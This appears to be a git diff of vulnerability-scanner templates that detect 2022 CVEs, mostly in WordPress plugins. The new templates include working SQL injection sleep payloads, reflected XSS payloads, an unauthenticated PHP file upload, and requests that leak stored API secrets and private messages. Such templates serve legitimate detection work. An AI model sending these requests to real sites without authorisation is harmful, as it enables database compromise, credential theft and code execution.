The WP Fundraising Donation and Crowdfunding Platform WordPress plugin before 1.5.0 does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users.
|
||||
WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
|
||||
- https://wordpress.org/plugins/wp-fundraising-donation/
|
||||
|
@ -37,3 +37,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "Invalid payment.")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0817
|
||||
|
||||
info:
|
||||
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
|
||||
name: WordPress BadgeOS <=3.7.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
|
||||
WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
|
||||
- https://wordpress.org/plugins/badgeos/
|
||||
|
@ -39,3 +39,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "badgeos-arrange-buttons")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2022-0826
|
||||
|
||||
info:
|
||||
name: WP Video Gallery <= 1.7.1 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5
|
||||
- https://wordpress.org/plugins/wp-video-gallery-free/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0826
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0826
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Registred videos :")'
|
||||
condition: and
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0867
|
||||
|
||||
info:
|
||||
name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi
|
||||
name: WordPress ARPrice <3.6.1 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users.
|
||||
WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
|
||||
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
|
||||
|
@ -42,3 +42,5 @@ requests:
|
|||
- 'contains(content_type_1, "text/html")'
|
||||
- 'contains(body_2, "ArpPriceTable")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -30,6 +30,7 @@ requests:
|
|||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
- "<!DOCTYPE html"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-0948
|
||||
|
||||
info:
|
||||
name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
|
||||
- https://wordpress.org/plugins/woc-order-alert/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0948
|
||||
- https://plugins.trac.wordpress.org/changeset/2707223
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0948
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /?rest_route=/olistener/new HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
content-type: application/json
|
||||
|
||||
{"id":" (SLEEP(6))#"}
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_1>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(content_type_1, "application/json")'
|
||||
- 'contains(body_2, "olistener-action.olistener-controller")'
|
||||
condition: and
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1007
|
||||
|
||||
info:
|
||||
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
|
||||
name: WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
|
||||
WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
|
||||
- https://wordpress.org/plugins/advanced-booking-calendar/
|
||||
|
@ -42,3 +42,5 @@ requests:
|
|||
- "contains(all_headers_2, 'text/html')"
|
||||
- "status_code_2 == 200"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1057
|
||||
|
||||
info:
|
||||
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
|
||||
name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
|
||||
WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
|
||||
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
|
||||
|
@ -33,3 +33,5 @@ requests:
|
|||
- 'status_code == 500'
|
||||
- 'contains(body, "been a critical error")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-1162
|
||||
|
||||
info:
|
||||
name: GitLab CE/EE - Hardcoded password
|
||||
author: GitLab Red Team
|
||||
severity: critical
|
||||
description: A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
|
||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1162
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-1162
|
||||
cwe-id: CWE-798
|
||||
metadata:
|
||||
shodan-query: http.title:"GitLab"
|
||||
tags: cve,cve2022,gitlab
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/users/sign_in"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa"
|
||||
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
|
||||
- "6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193"
|
||||
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
|
||||
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
|
||||
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '(?:application-)(\S{64})(?:\.css)'
|
|
@ -0,0 +1,59 @@
|
|||
id: CVE-2022-1442
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Metform <= 2.1.3 - Unauthenticated Sensitive Information Disclosure
|
||||
author: theamanrawat
|
||||
severity: high
|
||||
description: |
|
||||
The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
|
||||
reference:
|
||||
- https://gist.github.com/Xib3rR4dAr/6e6c6e5fa1f8818058c7f03de1eda6bf
|
||||
- https://wpscan.com/vulnerability/9f3fcdd4-9ddc-45d5-a4af-e58634813c2b
|
||||
- https://wordpress.org/plugins/metform/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1442
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-1442
|
||||
cwe-id: CWE-862
|
||||
metadata:
|
||||
google-dork: inurl:/wp-content/plugins/metform
|
||||
verified: "true"
|
||||
tags: wpscan,cve2022,wordpress,wp-plugin,disclosure,unauth,metform,cve,wp
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- "mf_recaptcha_secret_key"
|
||||
- "admin_email_from"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: id
|
||||
group: 1
|
||||
regex:
|
||||
- '<option value=\"([0-9]+)\"'
|
||||
internal: true
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2022-1595
|
||||
|
||||
info:
|
||||
name: HC Custom WP-Admin URL - 1.4 - Unauthenticated Secret URL Disclosure
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b
|
||||
- https://wordpress.org/plugins/hc-custom-wp-admin-url/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1595
|
||||
classification:
|
||||
cve-id: CVE-2022-1595
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
HEAD /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: valid_login_slug=1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "Location: ([a-zA-Z0-9_.\\/-]+)"
|
||||
- "wordpress_"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-1883
|
||||
|
||||
info:
|
||||
name: Terraboard <2.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
|
||||
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
|
||||
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-1883
|
||||
cwe-id: CWE-89
|
||||
tags: cve,cve2022,terraboard,sqli,huntr
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"page":'
|
||||
- '"results":'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2022-1916
|
||||
|
||||
info:
|
||||
name: WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1916
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-1916
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'woot-content-in-popup'
|
||||
- 'woot-system'
|
||||
- 'woot-table'
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/13
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-1933
|
||||
|
||||
info:
|
||||
name: WordPress CDI <5.1.9 - Cross Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf
|
||||
- https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1933
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-1933
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cdi,wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
- 'Tracking code not correct'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/13
|
|
@ -0,0 +1,75 @@
|
|||
id: CVE-2022-1952
|
||||
|
||||
info:
|
||||
name: eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Free Booking Plugin for Hotels, Restaurant and Car Rental WordPress plugin before 1.1.16 suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
|
||||
- https://wordpress.org/plugins/easync-booking/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1952
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-1952
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
|
||||
Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059
|
||||
|
||||
--------------------------98efee55508c5059
|
||||
Content-Disposition: form-data; name="action"
|
||||
|
||||
easync_session_store
|
||||
--------------------------98efee55508c5059
|
||||
Content-Disposition: form-data; name="type"
|
||||
|
||||
car
|
||||
--------------------------98efee55508c5059
|
||||
Content-Disposition: form-data; name="with_driver"
|
||||
|
||||
self-driven
|
||||
--------------------------98efee55508c5059
|
||||
Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<?php echo md5('CVE-2022-1952');?>
|
||||
|
||||
--------------------------98efee55508c5059--
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
|
||||
|
||||
- |
|
||||
GET /wp-content/uploads/{{filename}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- contains(all_headers_3, "text/html")
|
||||
- status_code_3 == 200
|
||||
- contains(body_1, 'success\":true')
|
||||
- contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: filename
|
||||
group: 1
|
||||
regex:
|
||||
- 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
|
||||
internal: true
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2022-2034
|
||||
|
||||
info:
|
||||
name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure
|
||||
author: imhunterand
|
||||
severity: medium
|
||||
description: |
|
||||
The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
|
||||
- https://hackerone.com/reports/1590237
|
||||
- https://wordpress.org/plugins/sensei-lms/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-2034
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2022-2034
|
||||
cwe-id: CWE-862
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"
|
||||
|
||||
payloads:
|
||||
num: helpers/wordlists/numbers.txt
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'sensei_message'
|
||||
- 'guid":{"rendered":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,71 @@
|
|||
id: CVE-2022-2185
|
||||
|
||||
info:
|
||||
name: GitLab CE/EE - Import RCE
|
||||
author: GitLab Red Team
|
||||
severity: high
|
||||
description: A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
|
||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2022-2185
|
||||
cwe-id: CWE-732
|
||||
metadata:
|
||||
shodan-query: http.title:"GitLab"
|
||||
tags: cve,cve2022,gitlab
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/users/sign_in"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa"
|
||||
- "1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b"
|
||||
- "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8"
|
||||
- "1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe"
|
||||
- "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7"
|
||||
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
|
||||
- "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be"
|
||||
- "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0"
|
||||
- "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7"
|
||||
- "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7"
|
||||
- "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9"
|
||||
- "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe"
|
||||
- "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de"
|
||||
- "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4"
|
||||
- "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f"
|
||||
- "6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424"
|
||||
- "6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193"
|
||||
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
|
||||
- "739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a"
|
||||
- "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df"
|
||||
- "7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213"
|
||||
- "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353"
|
||||
- "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159"
|
||||
- "95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e"
|
||||
- "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d"
|
||||
- "a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778"
|
||||
- "a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e"
|
||||
- "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2"
|
||||
- "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1"
|
||||
- "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209"
|
||||
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
|
||||
- "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee"
|
||||
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
|
||||
- "ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '(?:application-)(\S{64})(?:\.css)'
|
|
